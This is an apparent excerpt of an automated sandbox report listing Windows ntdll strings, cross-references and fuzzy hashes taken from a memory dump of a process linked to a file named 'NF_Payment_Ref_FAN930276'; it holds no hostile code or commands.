SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01B324C0
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01B32506
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01B325EB

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: a11c9f5d5a254c935200f0a0fee453f24ad875d9ce238499040b18e734ce3563
Instruction ID: c6f6b8ab027cf104875ceff24f30406ab2ea1321a83f295e6ba96e39f0709377
Opcode Fuzzy Hash: a11c9f5d5a254c935200f0a0fee453f24ad875d9ce238499040b18e734ce3563
Instruction Fuzzy Hash: 7A028EF1D002299FDB25DB94CD80BAAB7B8AF44304F4441DAE749A7241EB30AF85CF59

Function 01B68B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

SegmentHeap, xrefs: 01B68BE9
smss.exe, xrefs: 01B68B8B
heapType, xrefs: 01B68BCB
lsass.exe, xrefs: 01B68BA1
csrss.exe, xrefs: 01B68B80
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 01B68BD0
runtimebroker.exe, xrefs: 01B68B73
svchost.exe, xrefs: 01B68B68
DefaultBrowser_NOPUBLISHERID, xrefs: 01B68D00
services.exe, xrefs: 01B68B96

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: af2d0d7be6e2d90efd5e1b1829119f96318c91d6bc6a4c18100f6e93c968d1bb
Instruction ID: e2f165684f35744e73dd59430e7a1fcc6e0dee94a011e88e87bb89036ed00d6d
Opcode Fuzzy Hash: af2d0d7be6e2d90efd5e1b1829119f96318c91d6bc6a4c18100f6e93c968d1bb
Instruction Fuzzy Hash: 1951F2711143019BC72EDF188944BABBBECFFA8640F144A5DF998C7284E774D544CBA2

Function 01B70274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

Just reallocated block at %p to %Ix bytes, xrefs: 01B705F1
HEAP[%wZ]: , xrefs: 01B70399, 01B704A8, 01B705D0, 01B70675, 01B706CC
RtlReAllocateHeap, xrefs: 01B702BF, 01B70362
HEAP: , xrefs: 01B703A6, 01B704B5, 01B705DD, 01B70682, 01B706D9
About to reallocate block at %p to %Ix bytes, xrefs: 01B703BA
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 01B704D3
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 01B7069F
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 01B706EA

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: ea3ff458f4b89ebd8b63bd95e534705df728deaefd471ba45a4f1ff1fcccdcd8
Instruction ID: 565382365c1a940a291e39d2179d42e874d80befc54f1f4b259fa479a9704235
Opcode Fuzzy Hash: ea3ff458f4b89ebd8b63bd95e534705df728deaefd471ba45a4f1ff1fcccdcd8
Instruction Fuzzy Hash: F7D1F431500686EFDB2AEF69C491AADBBF5FF5A700F08809AF4569B653C774D980CB10

Function 01B489B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

VerifierFlags, xrefs: 01B48C50
AVRF: -*- final list of providers -*- , xrefs: 01B48B8F
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01B48A3D
VerifierDlls, xrefs: 01B48CBD
VerifierDebug, xrefs: 01B48CA5
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01B48A67
HandleTraces, xrefs: 01B48C8F

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: b6c684ace8097178b8c274b5f43bc1110c70886fc3d32005719370e5e5fe4ecf
Instruction ID: 999d226a179d9277d6232f1a16bad7902cd12753f03bbf1e182129d8730b611a
Opcode Fuzzy Hash: b6c684ace8097178b8c274b5f43bc1110c70886fc3d32005719370e5e5fe4ecf
Instruction Fuzzy Hash: 97913871646706AFDB3ADFA8C8C0B6B77E8EB54714F04859CFA41AB641C7B0AC00D796

Function 01ACEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

T, xrefs: 01ACEB4E
LdrpResSearchResourceInsideDirectory Exit, xrefs: 01ACEB6C
, xrefs: 01ACF299
LdrpResSearchResourceInsideDirectory Enter, xrefs: 01ACEB58
{, xrefs: 01B24643
R, xrefs: 01ACEB62

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: 4348e7e4f9eac99b27e9bd15f6664fc7409d6292aedc55b4fde6f2ed355e17b7
Instruction ID: fc576dc6187715fa2d07e51fcc6a013b895f6944c4b699de30a7025ed31e5c3f
Opcode Fuzzy Hash: 4348e7e4f9eac99b27e9bd15f6664fc7409d6292aedc55b4fde6f2ed355e17b7
Instruction Fuzzy Hash: CCA23774A0562A8FDF69CF18CD887A9BBB5EF49704F1442EAD91DA7250DB309E84CF40

Function 01AF63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 01B341FE
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 01B340D8
_LdrpInitialize, xrefs: 01B340DF, 01B34141, 01B34205, 01B3425F
minkernel\ntdll\ldrinit.c, xrefs: 01B340E9, 01B3414B, 01B3420F, 01B34269
Delaying execution failed with status 0x%08lx, xrefs: 01B34258
Process initialization failed with status 0x%08lx, xrefs: 01B3413A

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 719d6c6af1d6967ce259e0d4ee579e9fba8afa750a707b4d376878ef4ae0bb01
Instruction ID: c1e302b0140ddb17500204d11ecff5c3e723817a9abebaae2142db289539652b
Opcode Fuzzy Hash: 719d6c6af1d6967ce259e0d4ee579e9fba8afa750a707b4d376878ef4ae0bb01
Instruction Fuzzy Hash: 73913830B007159BEB39EF59DD84BAA7BA1FF81B14F0401ADFA047B682D7B49851C791

Function 01AB645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Getting the shim engine exports failed with status 0x%08lx, xrefs: 01B19A01
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01B199ED
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01B19A2A
minkernel\ntdll\ldrinit.c, xrefs: 01B19A11, 01B19A3A
apphelp.dll, xrefs: 01AB6496
LdrpInitShimEngine, xrefs: 01B199F4, 01B19A07, 01B19A30

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: e1ce316e43fa7d9d31d332ab0be7b3e89b3304c214005a7bf70b1e32c16541ae
Instruction ID: a645343f28050f51aa8c0accb2e80477dac505079ae4897105e27dedb4efc900
Opcode Fuzzy Hash: e1ce316e43fa7d9d31d332ab0be7b3e89b3304c214005a7bf70b1e32c16541ae
Instruction Fuzzy Hash: 16511272218344AFE724DF24C991FAB77E8FF84648F84091EF589971A5D770E904CB92

Function 01AFC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 01AFC6C4
minkernel\ntdll\ldrredirect.c, xrefs: 01B38181, 01B381F5
minkernel\ntdll\ldrinit.c, xrefs: 01AFC6C3
LdrpInitializeImportRedirection, xrefs: 01B38177, 01B381EB
Unable to build import redirection Table, Status = 0x%x, xrefs: 01B381E5
Loading import redirection DLL: '%wZ', xrefs: 01B38170

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: e77ce84f2f2278a9b0e63e81e4467cb3d16380abe1eae25e0adef8176a9bba42
Instruction ID: 0a9315c6712c91456d52c70e67dee8277e7eb9824a3a89e4fdeb23a962f0a57b
Opcode Fuzzy Hash: e77ce84f2f2278a9b0e63e81e4467cb3d16380abe1eae25e0adef8176a9bba42
Instruction Fuzzy Hash: F0311571644706AFC628EF6ADD85E2AB7E4FFD4B10F04059CF9846B291D760EC04C7A2

Function 01AF2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01B32180
RtlGetAssemblyStorageRoot, xrefs: 01B32160, 01B3219A, 01B321BA
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01B321BF
SXS: %s() passed the empty activation context, xrefs: 01B32165
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01B32178
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01B3219F

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: e31e62361f7779360da38d84a305a1f12e963836e22e3c45949aca836a31a68b
Instruction ID: 63b9b56f641ef6cec7d105dcd60f40173e0437b0f3d455be6f15821cf1087617
Opcode Fuzzy Hash: e31e62361f7779360da38d84a305a1f12e963836e22e3c45949aca836a31a68b
Instruction Fuzzy Hash: CB31D23AB4022577EB258ADACD41F6B7A78EBA5A50F0540DEBB04B7240D771DE0086A1

Function 01B0096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01B02DF0: LdrInitializeThunk.NTDLL ref: 01B02DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B00BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B00BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B00D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B00D74

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 1f92df212fb2f639c089b3d443c673c5f119856c8a8a26a49920a7cbe3bf2345
Instruction ID: c286dad89e420c206212038e7af4dbc4f5b09838561059870b1ea95d3560ab66
Opcode Fuzzy Hash: 1f92df212fb2f639c089b3d443c673c5f119856c8a8a26a49920a7cbe3bf2345
Instruction Fuzzy Hash: D9425A71900715DFDB25CF28C880BAABBF4FF44314F1445E9E989AB281E770AA85CF60

Function 01ACA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

6, xrefs: 01ACA3F7
LdrResFallbackLangList Exit, xrefs: 01ACA3FF
LdrResFallbackLangList Enter, xrefs: 01ACA3EF
8, xrefs: 01ACA3E7

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 9b95e756577133fa11e214558a8e3f4e750a493d7dd77fa1594e2c977634d026
Instruction ID: b704145a054531d1ad9845ae7ff3a75a50bfe208bd3b3a123a315db903d0ba39
Opcode Fuzzy Hash: 9b95e756577133fa11e214558a8e3f4e750a493d7dd77fa1594e2c977634d026
Instruction Fuzzy Hash: 39C1687420838A8BDB15CF68C144B6AB7F4BF94B04F0489AEF996CB251E734C949CB56

Function 01AF8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 01AF8422
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01AF855E
@, xrefs: 01AF8591
minkernel\ntdll\ldrinit.c, xrefs: 01AF8421

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 62b6aa7d20310a979f6db99efc11fffa1e1cad359409ee4960592813a4006be9
Instruction ID: bb6bad8e9efa9451868981f98537e5537f49ade3d79ad6ef0211e27b3c47ea33
Opcode Fuzzy Hash: 62b6aa7d20310a979f6db99efc11fffa1e1cad359409ee4960592813a4006be9
Instruction Fuzzy Hash: F991BA71508745AFDB22EF65CC84EABBAE8FF84750F40096EFA84D2141E338D944CB62

Function 01AF273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

.Local, xrefs: 01AF28D8
SXS: %s() passed the empty activation context, xrefs: 01B321DE
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01B322B6
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01B321D9, 01B322B1

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 01decd037d5058aff8ff90861b39b6e0829c85fc431a323e67ffd526fa9740b0
Instruction ID: c5a4291de85eb23cc55c3c6eb6a20f4fde383ce36f06d292cbe21ecb569f2f08
Opcode Fuzzy Hash: 01decd037d5058aff8ff90861b39b6e0829c85fc431a323e67ffd526fa9740b0
Instruction Fuzzy Hash: 1EA18D319012299BDB25CFA8CC84BA9B7B5FF58354F1541EEEA49A7251D730DE80CF90

Function 01AF4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01B33456
RtlDeactivateActivationContext, xrefs: 01B33425, 01B33432, 01B33451
SXS: %s() called with invalid flags 0x%08lx, xrefs: 01B3342A
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01B33437

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: 0c5692ae393021aa9d4d3beb23b7e2233627948e91b0ae29cffcd695d61630ce
Instruction ID: 0914904f0bd5b91d8e3f3fff3b8a967bec21abe1ef73677e06d57ef009847121
Opcode Fuzzy Hash: 0c5692ae393021aa9d4d3beb23b7e2233627948e91b0ae29cffcd695d61630ce
Instruction Fuzzy Hash: 70612436600712ABD726CF5DC881B2BB7E1FF84B60F18859DFA559B251DB30E811CB91

Function 01AC64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01B21028
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01B210AE
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01B20FE5
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01B2106B

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 9da0d47b589836a2a9aeaae8ec854e927dad8f46c772a76c9699ee66a29e041e
Instruction ID: 8f7b60c261ef08ac4303ef753052fe0d9c129d94d5f328d695725de257c34aec
Opcode Fuzzy Hash: 9da0d47b589836a2a9aeaae8ec854e927dad8f46c772a76c9699ee66a29e041e
Instruction Fuzzy Hash: 2371AF719043499FCB21EF28C884F977FA8EFA4B64F5404A8F9498B286D734D589CBD1

Function 01AE245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

LdrpDynamicShimModule, xrefs: 01B2A998
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01B2A992
minkernel\ntdll\ldrinit.c, xrefs: 01B2A9A2
apphelp.dll, xrefs: 01AE2462

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 2055e5a6d4104ef246091d933855995e981efb0230ed868979493aaf698d1137
Instruction ID: 6a42f6bacad9023595ec8ce7173172b965dd746fb78264d490f4c9a86977b034
Opcode Fuzzy Hash: 2055e5a6d4104ef246091d933855995e981efb0230ed868979493aaf698d1137
Instruction Fuzzy Hash: 2C314671A00212ABDB399F6AD8C5AAA77F8FF84B00F15009AE90467A55C7B06985CB80

Function 01AD29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01AD3255
HEAP: , xrefs: 01AD3264
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01AD327D

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: ee2b79d0a5d826127723d074af18cbea984842bcf06edbf93aca111d8f4c4d09
Instruction ID: b494be9c51f1525cc929a06f576db79d3d35643f5e45acb6aa43e5787187fda9
Opcode Fuzzy Hash: ee2b79d0a5d826127723d074af18cbea984842bcf06edbf93aca111d8f4c4d09
Instruction Fuzzy Hash: 7992CDB1A04A499FDF25CF68C4447AEBBF1FF48300F18809AE95AAB352D734A945CF51

Function 01AD0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01B250AE
(UCRBlock->Size >= *Size), xrefs: 01B250CA
HEAP: , xrefs: 01B250BD

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: c205de6c7c3455e9b463097e182777eddc24e97521c02a72d3e97eedb97b2247
Instruction ID: ef2bfdb105bc6ccf519c0da3dd54b817691f88d033f5961ca9568145eb91430b
Opcode Fuzzy Hash: c205de6c7c3455e9b463097e182777eddc24e97521c02a72d3e97eedb97b2247
Instruction Fuzzy Hash: 41F1CF70A00A06DFEB29CF69C984BAAB7F5FF45300F1441A8E51ADB391D734E985CB91

Function 01AE6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

, xrefs: 01B2CA51
@, xrefs: 01AE6C24

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: 23616321a46f996ec8a08b8316c907dcee01554369faac207c5240e320bdf936
Instruction ID: 63671a07e12cd1cb089f8cfa4d48ea06420b672cf612d5f428f2ee9671475151
Opcode Fuzzy Hash: 23616321a46f996ec8a08b8316c907dcee01554369faac207c5240e320bdf936
Instruction Fuzzy Hash: CDC2AF716083519FEB29CF68C884BABBBE5BF88714F04896DF989C7251D734D844CB92

Function 01ABA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

UseFilter, xrefs: 01ABA1C1
\??\, xrefs: 01B1C1E4
FilterFullPath, xrefs: 01B1C2E6

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: b8dc3605651ad4ffed766ddf16ef480a8f9450be4ad17e3516cdb9fecd56be96
Instruction ID: 6537e6c9fba25c6a0c0dd2985e95cb658f60349ca8d23e1267a80c479a4c0e5b
Opcode Fuzzy Hash: b8dc3605651ad4ffed766ddf16ef480a8f9450be4ad17e3516cdb9fecd56be96
Instruction Fuzzy Hash: EBA149719416299BDF359F68DC88BEABBB8EF48700F1101E9EA09A7250D7359E84CF50

Function 01AE0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

LdrpCheckModule, xrefs: 01B2A117
Failed to allocated memory for shimmed module list, xrefs: 01B2A10F
minkernel\ntdll\ldrinit.c, xrefs: 01B2A121

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: 19ef78ab79e64a840b1461ade7493d675a9aeebf77307fa624c8cbd90903527e
Instruction ID: 03c2652cdc3de1c23c9240e3f9834eda01261ca162db507f6175d53795bcc1b7
Opcode Fuzzy Hash: 19ef78ab79e64a840b1461ade7493d675a9aeebf77307fa624c8cbd90903527e
Instruction Fuzzy Hash: 8871D170A00205DFDB29DF68CA84ABEB7F4FB88704F18446DE906E7651D7B4AD45CB50

Function 01AFC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

Failed to reallocate the system dirs string !, xrefs: 01B382D7
LdrpInitializePerUserWindowsDirectory, xrefs: 01B382DE
minkernel\ntdll\ldrinit.c, xrefs: 01B382E8

Memory Dump Source

Source File: 00000004.00000002.2264826942.0000000001A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a90000_NF_Payment_Ref_FAN930276.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: d939a44e4f1262d35ecbafca7529dd9fe9d120756938732724b42e3e00a43a38
Instruction ID: 43a8db3bd735251134425613b3d8917cc5767eb51bd65d42960b5ab2b8d5d658
Opcode Fuzzy Hash: d939a44e4f1262d35ecbafca7529dd9fe9d120756938732724b42e3e00a43a38
Instruction Fuzzy Hash: C441D3B1944315ABC735EB69D984F9B77E8EF44760F04492EFA49D3254E7B0D800CB91

Function 01B7C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

@, xrefs: 01B7C1F1
